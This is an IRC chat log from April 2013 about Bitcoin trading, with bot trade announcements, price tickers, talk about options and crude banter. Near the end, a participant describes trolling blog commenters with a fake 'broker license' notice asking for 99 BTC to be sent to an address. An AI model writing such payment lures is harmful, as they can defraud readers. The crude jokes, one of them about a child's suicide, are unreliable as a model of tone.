Apr 16 17:39:41 [MPEX] [O.USD.P050T] 5 @ 1.080704 = 5.4035 BTC [+] Apr 16 17:39:57 [MPEX] [S.MPOE] 5000 @ 0.00069802 = 3.4901 BTC [-] Apr 16 17:40:08 $avg Apr 16 17:40:10 pgp: 68.88 Apr 16 17:41:53 [MPEX] [O.USD.C062N] 3 @ 0.80630438 = 2.4189 BTC [+] Apr 16 17:46:54 [MPEX] [S.MPOE] 5600 @ 0.00069512 = 3.8927 BTC [-] Apr 16 17:46:59 http://forum.kink.com/thread/33662 Apr 16 17:47:00 [MPEX] [S.MPOE] 8007 @ 0.00069311 = 5.5497 BTC [-] Apr 16 17:48:03 Bitcoin is a deadly pyramid scheme! Apr 16 17:49:04 mp: i understand that puts can be > 1, but if you look at it from a USD perspective all the put are guranteed losers, right? Apr 16 17:50:00 how so ? Apr 16 17:50:50 am i right in assuming that O.USD.P050T is "best" put right now? Apr 16 17:51:08 well... what's a best put ? Apr 16 17:51:31 the one with the lowest break even i suppose would be the "safest" Apr 16 17:51:35 lowest implied vol? just want to walk through an example Apr 16 17:52:00 which would be somewhere around P074 Apr 16 17:52:01 ok, let's try the example then. [MPEX] [O.USD.P050T] 5 @ 1.080704 = 5.4035 BTC [+] Apr 16 17:52:12 if you atm have 5.4035 btc, their value is whatever, 300 bucks. Apr 16 17:52:30 yes... Apr 16 17:52:32 sry ignore me Apr 16 17:52:35 was looking atcalls Apr 16 17:52:35 if you keep it as btc and btc goes to $6, you have 30 bucks. so from a fiat perspective lost 90% of your fortune. Apr 16 17:53:06 if you trade it for puts and btc goes to $6, you now have 44/6 * 5 = 35 btc or so. Apr 16 17:53:28 even if you count those at $6 each, it's hardly a loser compared to 30 bucks. Apr 16 17:54:38 best put atm is 89 Apr 16 17:54:40 35 BTC * 6 = $210 Apr 16 17:54:51 I started with $300 Apr 16 17:55:08 no way to win in fiat terms Apr 16 17:55:31 yes well, you didn't. you started with 5 btc. Apr 16 17:55:43 the easy way to get 300 is to sell out. Apr 16 17:55:50 basically the bot is of the opinion BTC is fucked, Apr 16 17:56:01 on the strength of what it saw in the charts. Apr 16 17:56:08 this is something we've been discussing at length yest i thought ? Apr 16 17:56:14 look at the trade in the sense that I start in fiat and end in fiat - guaranteed loser Apr 16 17:56:41 no puts or calls are really worth it atm Apr 16 17:56:55 as far as the bot is concerned, bitcoin is a dead horse it would seem. Apr 16 17:57:01 [BTCTC] [BITVPS] 2 @ 0.00063 = 0.0013 BTC [+] Apr 16 17:57:02 that was the entire point of yest's convo Apr 16 17:57:05 [BTCTC] [BITVPS] 8 @ 0.00062 = 0.005 BTC [-] Apr 16 17:57:20 bit is scurred Apr 16 17:57:22 if we used your prices, converted to USD and computed like convention option in USD, all puts are guaranteed losers... Apr 16 17:57:26 bot* Apr 16 17:57:37 so sell btc instead Apr 16 17:57:58 bot does not want out business Apr 16 17:58:02 our* Apr 16 17:58:57 more like "nothing that goes from 20 to 260 and then down to 60 has a future" Apr 16 17:59:06 which, on the strength of that alone, i find difficult to contest Apr 16 17:59:14 meh Apr 16 17:59:16 and the bot only sees graphs, charts and so forth. Apr 16 17:59:27 a little obtuse imo Apr 16 17:59:31 it doesn't make judgements as of technology etc. Apr 16 17:59:36 well ofcourse. it's a bot after all. Apr 16 17:59:48 it could still be making money Apr 16 18:00:04 if it was smarter Apr 16 18:00:53 [BTCTC] [GSDPT] 15 @ 0.0042 = 0.063 BTC [+] Apr 16 18:01:20 [BTCTC] [GSDPT] 14 @ 0.00421 = 0.0589 BTC [+] Apr 16 18:01:47 [BTCTC] [GSDPT] 157 @ 0.004285 = 0.6727 BTC [+] Apr 16 18:02:18 bot is an instrument in the volatility game, yet goes to bed when things get volatile Apr 16 18:02:43 [BTCTC] [GSDPT] 52 @ 0.004287 = 0.2229 BTC [+] Apr 16 18:03:23 yes. just like the guy on first base is an instrument in the game of baseball Apr 16 18:03:30 yet he leaves the field once somebody takes out a machete. Apr 16 18:03:37 lol Apr 16 18:03:45 micrea_popescu can you clear a deposit Apr 16 18:03:47 one of the key factors eveeryone has to consider when promoting idiocy, Apr 16 18:04:03 is machetes Apr 16 18:04:13 whether it's pirate idiocy like gigavps did, or price idiocy like keiser & co did, or simple technical idiocy like pushing tradehill or coinbase etc : Apr 16 18:04:19 as stupidity is promoted, sense simply leaves. Apr 16 18:05:22 like you said, we already discussed this, so I shouldnt beat the dead horse, but in the end the bot is flawed Apr 16 18:06:24 not a horrible crime Apr 16 18:06:49 im not terivbly sure it's flawed. Apr 16 18:06:57 we are looking into it, but overall it's a difficult argument. Apr 16 18:07:07 anwyay. deposits flushed. Apr 16 18:07:15 I wouldn't let most any of my own automated trader bots trade in this market Apr 16 18:07:44 the chief idea here is that mechanisms that exist to make this a market, and serious, and worth money, and respectable, Apr 16 18:07:48 can be wrecked by people being idiots. Apr 16 18:08:08 inasmuch as people behave idiotically they have not the right to functioning mechanisms, nor are entitled to actual service. Apr 16 18:08:20 swing machetes made of USD around wildly in the air Apr 16 18:09:00 i guess the one most bitter lesson btc will force down people's throats is that elusive personal responsibility thing. Apr 16 18:09:20 that conservatives always roil about and socialists keep pretending to have never quite heard of. Apr 16 18:09:37 didnt know the bot was so political Apr 16 18:10:11 maybe the bot should tweet Apr 16 18:10:18 lol Apr 16 18:10:25 nature of the world is political sadly. Apr 16 18:13:23 [MPEX] [O.USD.P059T] 90 @ 0.2 = 18 BTC Apr 16 18:17:30 [MPEX] [O.USD.P059T] 18 @ 0.2 = 3.6 BTC Apr 16 18:19:42 [BTCTC] [ASICMINER-PT] 1 @ 0.861 BTC [+] Apr 16 18:25:16 17:22.30 ( coinmaster ) [MtGox] BTC 66.920 USD (-1.280 USD) Apr 16 18:25:16 17:22.34 ( coinmaster ) [Stamp] BTC 74.780 USD (+0.780 USD) Apr 16 18:25:19 lulz Apr 16 18:26:25 /rally -on Apr 16 18:26:49 !r CyrusAFK Apr 16 18:28:23 http://www.youtube.com/watch?v=EZaOhMk1r5I Apr 16 18:28:27 well Apr 16 18:28:33 we have some buying happening Apr 16 18:28:34 76 Apr 16 18:28:37 77 Apr 16 18:28:38 lmao Apr 16 18:28:46 78 Apr 16 18:28:56 hold for my deposits plzzzzz Apr 16 18:29:20 someone wanted 10k btc Apr 16 18:29:31 [BTCTC] [ASICMINER-PT] 1 @ 0.80101 BTC [-] Apr 16 18:29:35 [BTCTC] [ASICMINER-PT] 1 @ 0.801 BTC [-] Apr 16 18:29:38 [BTCTC] [ASICMINER-PT] 5 @ 0.790301 = 3.9515 BTC [-] Apr 16 18:29:40 [BTCTC] [ASICMINER-PT] 2 @ 0.7903 = 1.5806 BTC [-] Apr 16 18:29:43 [BTCTC] [ASICMINER-PT] 2 @ 0.7903 = 1.5806 BTC [-] Apr 16 18:29:56 [BTCTC] [ASICMINER-PT] 3 @ 0.790233 = 2.3707 BTC [-] Apr 16 18:29:59 [BTCTC] [ASICMINER-PT] 5 @ 0.790202 = 3.951 BTC [-] Apr 16 18:30:13 [BTCTC] [ASICMINER-PT] 1 @ 0.7902 BTC [-] Apr 16 18:30:16 [BTCTC] [ASICMINER-PT] 5 @ 0.7901 = 3.9505 BTC [-] Apr 16 18:30:19 [BTCTC] [ASICMINER-PT] 9 @ 0.79 = 7.11 BTC [-] Apr 16 18:30:57 so everything's back to normal! Apr 16 18:31:06 buy buy buy ;) Apr 16 18:31:53 lag is back? Apr 16 18:31:57 ;;goxlag Apr 16 18:31:58 MtGox lag is 8.284369 seconds. During this time, light travels 0.0166017827196 AU. You could have sent a bitcoin one full loop along the orbit of the Moon around Earth (0.016 AU). Apr 16 18:32:25 got pizza on the processor again Apr 16 18:33:08 So now they freez at high price Apr 16 18:33:13 to influence markets Apr 16 18:33:16 to buy Apr 16 18:33:23 for another big dump Apr 16 18:33:56 ;;goxlag Apr 16 18:33:57 MtGox lag is 2.067305 seconds. During this time, light travels 0.0041428560733 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Apr 16 18:34:22 ddos? Apr 16 18:34:36 quality Apr 16 18:34:42 feels ddos-like since sites other mtgox are acting wonky Apr 16 18:34:45 that's the upgraded hardware Apr 16 18:34:48 doing its job Apr 16 18:34:56 and back down again Apr 16 18:34:58 other than mtgox Apr 16 18:35:41 ;;ticker Apr 16 18:35:43 BTCUSD ticker | Best bid: 71.13370, Best ask: 71.19999, Bid-ask spread: 0.06629, Last trade: 71.30500, 24 hour volume: 599982.61592459, 24 hour low: 50.01000, 24 hour high: 96.41990, 24 hour vwap: 68.47706 Apr 16 18:36:41 burnside wake up! Apr 16 18:39:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1551 BTC [+] Apr 16 18:42:44 [MPEX] [O.USD.P059T] 4 @ 0.2 = 0.8 BTC Apr 16 18:44:12 [MPEX] [O.USD.P059T] 1 @ 0.2 BTC Apr 16 18:51:33 ;;ticker Apr 16 18:51:34 BTCUSD ticker | Best bid: 77.00000, Best ask: 77.19000, Bid-ask spread: 0.19000, Last trade: 77.00000, 24 hour volume: 604694.37166289, 24 hour low: 50.01000, 24 hour high: 96.35000, 24 hour vwap: 68.48964 Apr 16 18:57:30 [MPEX] [S.DICE] 2000 @ 0.00365 = 7.3 BTC [+] Apr 16 18:57:32 [MPEX] [S.DICE] 1000 @ 0.00365001 = 3.65 BTC [+] Apr 16 18:57:43 [MPEX] [S.DICE] 1000 @ 0.00355003 = 3.55 BTC [-] Apr 16 18:58:10 [MPEX] [O.USD.P059T] 15 @ 0.2 = 3 BTC Apr 16 18:58:24 looking much better Apr 16 18:59:21 [MPEX] [O.USD.P059T] 3 @ 0.2 = 0.6 BTC Apr 16 19:06:04 24h volume is 614k on gox - my, my, that's a lot of coin Apr 16 19:13:54 [BTCTC] [CRYPTO-TRADE] 1 @ 0.14399 BTC [-] Apr 16 19:15:34 pgp: I have traded over 2500 BTC on ~250 BTC... Apr 16 19:16:01 614k is probably less than actual BTC traded, probably a good chunk of back and forth Apr 16 19:16:56 Fortunately... Apr 16 19:18:37 [BTCTC] [BASIC-MINING] 4 @ 0.43 = 1.72 BTC [+] Apr 16 19:19:16 ;;next Apr 16 19:19:17 57-58 support | resistance: 70, 77, 85-88 | upper target in case of breakout mid-90s - 100 | highest targets 111-113 | updated by OneFixt at Apr 16 2013, 10:40 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 5 hours, 39 minutes, and 17 seconds ago Apr 16 19:21:31 ... Apr 16 19:23:18 [BTCTC] [CRYPTO-TRADE] 1 @ 0.14399 BTC [-] Apr 16 19:24:06 ;;next Apr 16 19:24:06 57-58 support | resistance: 70, 77, 85-88 | upper target in case of breakout mid-90s - 100 | highest targets 111-113 | updated by OneFixt at Apr 16 2013, 10:40 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 5 hours, 44 minutes, and 6 seconds ago Apr 16 19:24:13 oh nice Apr 16 19:24:23 this is not nice Apr 16 19:24:27 you are not polite Apr 16 19:24:30 behave. Apr 16 19:24:57 ;;ticker Apr 16 19:24:58 BTCUSD ticker | Best bid: 75.00000, Best ask: 75.20000, Bid-ask spread: 0.20000, Last trade: 75.00000, 24 hour volume: 619256.52243863, 24 hour low: 50.01000, 24 hour high: 95.99999, 24 hour vwap: 68.57269 Apr 16 19:25:17 95? when? Apr 16 19:25:24 yesterday Apr 16 19:25:33 yeah Apr 16 19:27:09 [BTCTC] [CRYPTO-TRADE] 1 @ 0.14399 BTC [-] Apr 16 19:27:53 http://jcph.am/2013/04/15/good-love/ Apr 16 19:27:56 more blog Apr 16 19:28:51 [MPEX] [S.DICE] 2112 @ 0.0036 = 7.6032 BTC [+] Apr 16 19:28:53 [MPEX] [S.DICE] 1000 @ 0.00350001 = 3.5 BTC [-] Apr 16 19:29:53 [MPEX] [O.USD.P059T] 13 @ 0.2 = 2.6 BTC Apr 16 19:31:17 [BTCTC] [CRYPTO-TRADE] 1 @ 0.15 BTC [+] Apr 16 19:31:33 hm Apr 16 19:31:42 i just switched that video to 2.30 or smth Apr 16 19:31:46 whats that garbage Apr 16 19:32:03 [MPEX] [O.USD.P059T] 2 @ 0.2 = 0.4 BTC Apr 16 19:32:15 failing to imitate outcast Apr 16 19:32:15 cats in heat murdering each other Apr 16 19:32:24 HIV Apr 16 19:32:48 marvin gaye after that Apr 16 19:32:51 [BTCTC] [COGNITIVE] 1 @ 0.14 BTC [-] Apr 16 19:33:28 ;;asks 89.9 Apr 16 19:33:29 There are currently 28254.964 bitcoins offered at or under 89.9 USD, worth 2384060.18064 USD in total. | Data vintage: 34.7650 seconds Apr 16 19:33:40 ;;bids 80 Apr 16 19:33:40 There are currently 0 bitcoins demanded at or over 80.0 USD, worth 0.0 USD in total. | Data vintage: 46.6460 seconds Apr 16 19:34:54 [MPEX] [S.DICE] 1000 @ 0.00340001 = 3.4 BTC [-] Apr 16 19:35:46 [MPEX] [O.USD.P059T] 4 @ 0.2 = 0.8 BTC Apr 16 19:37:00 [MPEX] [S.MPOE] 3740 @ 0.00069482 = 2.5986 BTC [+] Apr 16 19:37:19 [BTCTC] [CRYPTO-TRADE] 1 @ 0.14001 BTC [-] Apr 16 19:37:32 [BTCTC] [CRYPTO-TRADE] 1 @ 0.14 BTC [-] Apr 16 19:44:21 ;;ticker --vol Apr 16 19:44:22 625728.90077261 Apr 16 19:44:24 sick Apr 16 19:45:02 ;;asks 89.9 Apr 16 19:45:04 There are currently 24685.39 bitcoins offered at or under 89.9 USD, worth 2107078.45197 USD in total. | Data vintage: 0.0031 seconds Apr 16 19:46:18 ;;ticker Apr 16 19:46:19 BTCUSD ticker | Best bid: 80.25100, Best ask: 80.44815, Bid-ask spread: 0.19715, Last trade: 80.44815, 24 hour volume: 629746.79613590, 24 hour low: 50.01000, 24 hour high: 95.90000, 24 hour vwap: 68.70007 Apr 16 19:47:06 ;;next Apr 16 19:47:06 57-58 support | resistance: 70, 77, 85-88 | upper target in case of breakout mid-90s - 100 | highest targets 111-113 | updated by OneFixt at Apr 16 2013, 10:40 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 6 hours, 7 minutes, and 6 seconds ago Apr 16 19:47:33 ;;eightball 90$ today ? Apr 16 19:47:33 The answer is def-- oooh! shiny thing! Apr 16 19:48:23 it was just a temporary setback guys Apr 16 19:48:27 moving ALL IN Apr 16 19:48:39 ;;eightball Will price go down to 40 USD/BTC today? Apr 16 19:48:40 The answer is certainly yes. Apr 16 19:49:11 go home eightball u'r drunk Apr 16 19:50:32 still 70% cashed out bug ? Apr 16 19:50:43 lol Apr 16 19:50:43 nope Apr 16 19:50:46 100% Apr 16 19:50:48 actually Apr 16 19:50:53 [BTCTC] [CRYPTO-TRADE] 1 @ 0.17999 BTC [+] Apr 16 19:50:56 100% cashed out... sounds like me Apr 16 19:50:57 [BTCTC] [CRYPTO-TRADE] 2 @ 0.18 = 0.36 BTC [+] Apr 16 19:50:58 need to cash out the proceeds from the call sales Apr 16 19:51:00 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1885 BTC [+] Apr 16 19:51:04 [BTCTC] [CRYPTO-TRADE] 6 @ 0.19 = 1.14 BTC [+] Apr 16 19:51:07 [BTCTC] [CRYPTO-TRADE] 100 @ 0.19 = 19 BTC [+] Apr 16 19:52:00 [HAVELOCK] [SDICE] 10 @ 0.37 = 3.7 BTC [+] Apr 16 19:52:06 you are moving in at 80? Apr 16 19:52:25 he wait for 30 Apr 16 19:52:33 18:48.24 ( Bugpowder ) moving ALL IN Apr 16 19:52:41 joking Apr 16 19:52:47 sorry Apr 16 19:53:00 well i wouldnt be suprised tbh Apr 16 19:53:11 ;;asks 89.9 Apr 16 19:53:11 hee hee Apr 16 19:53:13 There are currently 20219.645 bitcoins offered at or under 89.9 USD, worth 1753446.30424 USD in total. | Data vintage: 0.0031 seconds Apr 16 19:53:50 I just wish I hadn't sold what I picked up at 52 and 51 last night Apr 16 19:54:05 good trade needs good entry, check, good exit, FAIL. Apr 16 19:54:30 exit is the bigger part of the trade Apr 16 19:55:40 ;;goxlag Apr 16 19:55:40 MtGox lag is 18.6353 seconds. During this time, light travels 0.0373449325488 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 16 20:01:03 OK. Final Ponzi Plot update. Future updates will start from $1 again. Apr 16 20:01:05 http://i.imgur.com/weHoYzJ.png Apr 16 20:03:03 dope track http://www.youtube.com/watch?v=uSaYQc3z7us Apr 16 20:03:59 [MPEX] [S.MPOE] 4000 @ 0.00069482 = 2.7793 BTC [+] Apr 16 20:05:09 http://trilema.com/2013/because-most-people-are-idiots-in-spite-of-never-manning-up-and-admitting-to-it/#comment-92759 Apr 16 20:05:22 there's a bunch of people looking to verbally invest into btc Apr 16 20:05:29 lol Apr 16 20:05:37 i'm getting a few dozen a week by now. Apr 16 20:05:53 i wonder what's the headcount of bullshit artists at today. 4bn ? 7bn ? Apr 16 20:07:20 You know what's cooler than claiming a $100,000 investment in BTC? Claiming a $10,000,000 investment. Apr 16 20:07:46 you know what's more idiotic than claiming you're a millionaire while begging for free pizza ? Apr 16 20:08:27 no imagination these days. Apr 16 20:08:33 gotta think big peopel! Apr 16 20:09:27 i think some became millionaries by begging for free pizzas Apr 16 20:10:18 some became millionaries with 2 pizzas Apr 16 20:10:44 yeah mp you really should have picked a different dish Apr 16 20:11:07 pizzas have implications. Apr 16 20:11:11 ;;ticker Apr 16 20:11:12 BTCUSD ticker | Best bid: 74.20000, Best ask: 74.38000, Bid-ask spread: 0.18000, Last trade: 75.00000, 24 hour volume: 643361.01494130, 24 hour low: 50.01000, 24 hour high: 94.67089, 24 hour vwap: 68.78895 Apr 16 20:11:15 One of the more exciting moments from last night... http://i.imgur.com/2cJLOTO.png Apr 16 20:11:44 kakobrekla they do ?! what ? Apr 16 20:11:53 o nm lol. Apr 16 20:11:57 yeah. baklava. Apr 16 20:12:49 yeah i pasted a link to the book when it was showing that Apr 16 20:12:54 but dub said 'wut' Apr 16 20:13:01 yes and I capped it Apr 16 20:14:41 [BTCTC] [S.MPOE-PT] 1 @ 0.00065 BTC [-] Apr 16 20:14:44 [BTCTC] [S.MPOE-PT] 200 @ 0.00064 = 0.128 BTC [-] Apr 16 20:14:47 [BTCTC] [S.MPOE-PT] 5 @ 0.00063 = 0.0032 BTC [-] Apr 16 20:14:50 [BTCTC] [S.MPOE-PT] 40 @ 0.00062 = 0.0248 BTC [-] Apr 16 20:14:51 >>http://i.imgur.com/2cJLOTO.png Apr 16 20:14:52 [BTCTC] [S.MPOE-PT] 250 @ 0.00061 = 0.1525 BTC [-] Apr 16 20:14:56 did you name it LOTO ? Apr 16 20:15:01 [BTCTC] [S.MPOE-PT] 20 @ 0.000609 = 0.0122 BTC [-] Apr 16 20:15:04 [BTCTC] [S.MPOE-PT] 1 @ 0.000608 BTC [-] Apr 16 20:15:06 [BTCTC] [S.MPOE-PT] 726 @ 0.000608 = 0.4414 BTC [-] Apr 16 20:15:09 [BTCTC] [S.MPOE-PT] 99 @ 0.000607 = 0.0601 BTC [-] Apr 16 20:15:12 [BTCTC] [S.MPOE-PT] 4 @ 0.0006 = 0.0024 BTC [-] Apr 16 20:15:15 [BTCTC] [S.MPOE-PT] 200 @ 0.0006 = 0.12 BTC [-] Apr 16 20:15:25 there goes the 50-100k investment ;/ Apr 16 20:15:48 nope Apr 16 20:15:58 cause it was a lottery Apr 16 20:16:00 its the new YOLO Apr 16 20:16:21 hehe Apr 16 20:18:25 646,000 BTC / 24hr Apr 16 20:18:35 just keeps rising Apr 16 20:18:53 good sign i guess Apr 16 20:19:28 lack of lag is nice Apr 16 20:19:32 [BTCTC] [S.MPOE-PT] 1 @ 0.00058 BTC [-] Apr 16 20:19:35 [BTCTC] [S.MPOE-PT] 3725 @ 0.000566 = 2.1084 BTC [-] Apr 16 20:20:07 my wife just brought me a sandwich and walked out\ Apr 16 20:20:15 I wonder how much added liquidity is a result of the reduced fees from couting all the volume during the free trade period towards current fee schedule. Apr 16 20:20:17 jcpham: sounds like a good wife Apr 16 20:20:26 i'm speechless Apr 16 20:20:45 [BTCTC] [GSDPT] 16 @ 0.003811 = 0.061 BTC [-] Apr 16 20:20:56 jcpham you need to start with domestication early Apr 16 20:20:59 thats is the trick Apr 16 20:21:05 it's just the whales playing with each other Apr 16 20:21:08 they will get bored Apr 16 20:21:11 it has bacon on it too Apr 16 20:21:42 she know you have hard time Apr 16 20:21:45 theyll get borred and go back fapping sdice Apr 16 20:21:48 the bugpowdery whales Apr 16 20:21:49 well you already married her, all you can do now is eat your sandwich Apr 16 20:21:55 ikr Apr 16 20:22:00 need to do something for her Apr 16 20:22:16 return empty plate? Apr 16 20:22:24 perfect plan!\ Apr 16 20:22:38 ask for a second round, best compliment ever Apr 16 20:22:43 just tell her you love her and don't dutch oven her. that should be good for a while. Apr 16 20:23:00 "blow me while i day trade honey" Apr 16 20:23:01 [BTCTC] [ASICMINER-PT] 2 @ 0.837 = 1.674 BTC [+] Apr 16 20:23:43 so is jcpham dead from cyanide poisoning yet ? Apr 16 20:23:51 [MPEX] [S.MPOE] 6750 @ 0.0006891 = 4.6514 BTC [-] Apr 16 20:24:08 did she ask how reddem a private key yesterday ? Apr 16 20:24:46 Bugpowder, what's the red USD scale in that last plot? USD/BTC? Thousands? I think I get the blue scale. Apr 16 20:24:58 sadly she knows the passphrase to my wallet Apr 16 20:25:03 fold gain in $ terms Apr 16 20:25:30 ...if only she knew how to mount an encrypted truecrypt container Apr 16 20:25:30 so its 5 letter max ! sounds a bad passphrase ! Apr 16 20:27:19 ;;bids 0 Apr 16 20:27:20 There are currently 52749739 bitcoins demanded at or over 0.0 USD, worth 12462919.8992 USD in total. | Data vintage: 17.3470 seconds Apr 16 20:27:44 16M$ yesterday :/ sick sick Apr 16 20:28:29 10M early this morning Apr 16 20:28:39 Ah, it was just the $ on the axis labels throwing me off. Apr 16 20:28:40 I'm losing faith in the predictive power of this indicator Apr 16 20:29:35 there is a lot of noise Apr 16 20:30:13 So the plot ends at 25x in USD terms, 3x in BTC terms. That'll do, pig. That'll do. Apr 16 20:31:29 it sounds so small when you say it like that Apr 16 20:31:51 (Has anyone seen the movie "Babe"? No?) Apr 16 20:32:07 the talking pig movie? Apr 16 20:32:09 no Apr 16 20:32:12 File it under famous movie understatements. Apr 16 20:32:55 The pig saves the farm, incredible achievements transpire, and the perpetually grumpy farmer finally says something positive. Apr 16 20:33:57 http://stream.pleated-jeans.com/post/8902740029/thatll-do-pig Apr 16 20:34:22 lol Apr 16 20:37:01 [HAVELOCK] [VTX] 2 @ 0.51 = 1.02 BTC [+] Apr 16 20:37:19 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19499 BTC [+] Apr 16 20:37:27 [BTCTC] [CRYPTO-TRADE] 113 @ 0.195 = 22.035 BTC [+] Apr 16 20:44:10 [BTCTC] [ASICMINER-PT] 10 @ 0.80599 = 8.0599 BTC [-] Apr 16 20:44:14 http://online.wsj.com/article/PR-CO-20130416-909009.html Apr 16 20:44:25 [BTCTC] [ASICMINER-PT] 1 @ 0.805 BTC [-] Apr 16 20:44:28 [BTCTC] [ASICMINER-PT] 1 @ 0.801 BTC [-] Apr 16 20:44:31 [BTCTC] [ASICMINER-PT] 1 @ 0.801 BTC [-] Apr 16 20:44:34 [BTCTC] [ASICMINER-PT] 20 @ 0.791 = 15.82 BTC [-] Apr 16 20:45:01 binary bets :/ Apr 16 20:47:12 binany options is like satoshi dice... negative EV Apr 16 20:50:18 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19899 BTC [+] Apr 16 20:50:46 [BTCTC] [CRYPTO-TRADE] 1 @ 0.15001 BTC [-] Apr 16 20:52:32 Back to 70 Apr 16 20:52:38 well pretty much every scam has to be tried out at least once Apr 16 20:53:24 did u see the million dollar bitcoin homepage Apr 16 20:53:24 ? Apr 16 20:56:04 lol, just read bitcoin-assets.com again. "- don’t slap yourself [in public] (yes you DeadWeasel), it’s spammy" Apr 16 20:57:10 thinking about getting long? http://www.bing.com/videos/watch/video/bad-idea-jeans/17w5aaq4o Apr 16 20:57:44 us only Apr 16 20:58:26 Bugpowder the million dollar bitycoin ? or the bitbillion ? Apr 16 20:58:40 or bitmillions or w/e the fuck ? thye kinda run together by now Apr 16 20:59:29 http://www.milliondollarbitcoinhomepage.com/faq.php Apr 16 20:59:32 The faq is pretty embarrassing... suprised he hasn't taken it down yet. Apr 16 20:59:41 Filling up fast. http://www.milliondollarbitcoinhomepage.com/index.php Apr 16 21:01:16 heh. is this a buttcoin parody ? Apr 16 21:01:19 i bought it all and painted gray Apr 16 21:01:51 "14.04.2013 Apr 16 21:01:51 Website Traffic Apr 16 21:01:51 The site traffic is growing every day! Today almost 1,000 uniques and counting. Be the first to pick up your spot on the homepage. Prime time to pick the best spots =)" Apr 16 21:02:29 lol at the faq….that is so retarded Apr 16 21:03:07 he should seed the page with some fake ads Apr 16 21:03:18 put an mpex and mtgox ad on there Apr 16 21:03:24 give it some cred Apr 16 21:03:29 he did ?! Apr 16 21:04:00 Available: 1,000,000 Busy: 0 Apr 16 21:04:01 where ? Apr 16 21:04:05 im just trying to see how much it costs to write fuck you there but its expecive as shit Apr 16 21:04:33 he should Apr 16 21:04:47 not clever enough Apr 16 21:05:02 http://i.imgur.com/9uxIPKb.png Apr 16 21:05:04 I WIN Apr 16 21:05:08 the street musician ALWAYS has some money in the hat Apr 16 21:05:19 he's not smart enough to make a buck busking Apr 16 21:05:24 hence why he's on the internet. Apr 16 21:06:05 also, 100 dollars per pixel ? what's this to do with bitcoins. Apr 16 21:06:25 shrug i got bored of drawing dicks Apr 16 21:07:11 doesn't minesweeper for shit Apr 16 21:07:13 8======>~~~~~~~~ Apr 16 21:07:17 never found a single mine Apr 16 21:07:30 lol Apr 16 21:07:39 lol Apr 16 21:08:00 thats because you're so good at it. Apr 16 21:08:44 drawing dicks or playing minesweeper ;)? Apr 16 21:09:00 [HAVELOCK] [HIM] 3 @ 1.71 = 5.13 BTC [+] Apr 16 21:09:02 [HAVELOCK] [HIM] 1 @ 1.70000001 BTC [-] Apr 16 21:09:03 [HAVELOCK] [HIM] 5 @ 1.7 = 8.5 BTC [-] Apr 16 21:09:09 yea Apr 16 21:09:33 finding dick patterns in the freemine zone Apr 16 21:09:55 that's a minesweeping tactic Apr 16 21:09:57 here's a funny story Apr 16 21:10:06 this one time i was sitting around this campfire Apr 16 21:10:09 the dicks i mean Apr 16 21:10:17 this 12 year old kid blurts out Apr 16 21:10:28 "that fire looks like satan's penis!" Apr 16 21:10:32 i say Apr 16 21:10:46 "excuse me, were you thinking about dicks just now?" Apr 16 21:10:51 everyone laughs at kid Apr 16 21:11:06 kid commits suicide... Apr 16 21:11:11 yeah... Apr 16 21:11:28 poor guy was broken in front of his peers Apr 16 21:13:31 the only proper response to that is "I was thinking how your mom fits mine perfectly" Apr 16 21:13:52 only response Apr 16 21:16:49 that awkward moment when you're watching a vid of some girls going down some stairs and exlaim "wait a second, this is that hotel in belgrade" Apr 16 21:17:06 only to immediately realise that a. yes it is, b. they're getting banged and c. that's actually when you were there. Apr 16 21:17:35 worse than satan penis. now people think i'm going senile. Apr 16 21:17:57 how does that follow? Apr 16 21:18:37 you forgot you filmed them? Apr 16 21:19:28 i didn't film it Apr 16 21:19:47 i was just there in case they needed money to replace destroyed underwear etc. Apr 16 21:20:06 sounds reasonable Apr 16 21:21:02 my underwear is in tatters: 1GdtkZzhZTzBssUq6bnE27cz4rv5SJ4sr5 Apr 16 21:21:16 must have proof first miss. Apr 16 21:22:34 deadweasel you whore, how is my job? Apr 16 21:23:20 it's in the queue. Apr 16 21:23:27 don't tell me you fapped hard and spranied wrist again :) Apr 16 21:23:43 this time he was tryhing something new Apr 16 21:23:46 and sprained his thumb Apr 16 21:24:17 new AND exciting! Apr 16 21:27:46 "This is not the case here. Paying the 30BTC doesn’t mean that other people can then trade via me and I will be able to earn commissions from their trades." Apr 16 21:28:18 according to new research. Apr 16 21:29:18 where? i so want to troll them that i paid for special broker license Apr 16 21:29:29 on trilema Apr 16 21:30:26 people have found the article where some doods who explain how $600 is way too much are being hammered, and want to add their own "$3000 is too much" contributions. Apr 16 21:30:41 basically the internet is this place where funny just grows. like a sort of agar for humor. Apr 16 21:31:00 or fungus Apr 16 21:32:24 [MPEX] [S.MPOE] 5060 @ 0.00069482 = 3.5158 BTC [+] Apr 16 21:32:25 [MPEX] [S.MPOE] 1315 @ 0.00069802 = 0.9179 BTC [+] Apr 16 21:33:03 Yes, you’re correct. For reselling MPEx account, you need special broker license from exclusive reseller such as CoinBr.com. To obtain it, please send 99 BTC to CoinBr662GWdiqVz8mXJUnYjWZbBchKAb . Apr 16 21:33:12 ftw Apr 16 21:33:34 no 1 ? Apr 16 21:33:38 you started your own scamcoin ? Apr 16 21:34:00 no, just issuing mpex broker licenses Apr 16 21:34:36 lets see what happens nao Apr 16 21:34:54 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 16 21:34:57 BTCUSD ticker | Best bid: 69.22100, Best ask: 69.98000, Bid-ask spread: 0.75900, Last trade: 69.22100, 24 hour volume: 657938.34800807, 24 hour low: 50.01000, 24 hour high: 93.00998, 24 hour vwap: 68.33931 Apr 16 21:35:06 don't forget the monthly upkeep fee. Apr 16 21:35:45 that's there, in fine print Apr 16 21:39:11 i wonder if the two are the same one guy. Apr 16 21:45:41 holy shit, you see unconfirmed transactions Apr 16 21:45:45 5674 Apr 16 21:46:06 well a block just went through, still over 5000 Apr 16 